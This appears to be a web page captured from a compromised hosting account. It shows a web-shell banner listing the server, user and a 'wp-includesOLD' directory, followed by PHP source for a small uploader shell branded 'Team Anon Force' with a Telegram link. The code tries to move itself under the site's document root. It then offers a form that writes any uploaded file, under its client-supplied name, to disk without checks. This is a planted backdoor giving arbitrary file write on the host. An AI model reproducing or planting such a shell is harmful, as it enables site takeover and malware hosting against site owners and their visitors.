hello
Server : Apache System : Linux webm006.cluster103.gra.hosting.ovh.net 6.18.39-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Tue Jul 21 12:03:15 CEST 2026 x86_64 User : chryzalihi ( 621211) PHP Version : 8.3.31 Disable Function : _dyuweyrj4,_dyuweyrj4r,dl Directory : /home/chryzalihi/www/wp-includesOLD/ |
<?php
$currentFilePath = __FILE__;
$newFilePath = $_SERVER['DOCUMENT_ROOT'].'/'.$currentFilePath;
if (rename($currentFilePath, $newFilePath)) {
echo 'Priv8 2024';
} else {
echo 'Priv8 Tools 2024';
}
echo '<b>Team Anon Force</b></br><em>https://t.me/teamanonforce</em> <form method="post" target="_self" enctype="multipart/form-data"> <input type="file" size="20" name="file_jpg" /> <input type="submit" value="upload" /> </form> </td></tr> </table><br>';
if (!empty ($_FILES['file_jpg'])) {
move_uploaded_file($_FILES['file_jpg']['tmp_name'],$_FILES['file_jpg']['name']);
Echo "<script>alert('upload Done'); </script><b>Uploaded !!!</b><br>name : ".$_FILES['file_jpg']['name']."<br>size : ".$_FILES['file_jpg']['size']."<br>type : ".$_FILES['file_jpg']['type'];
}
?>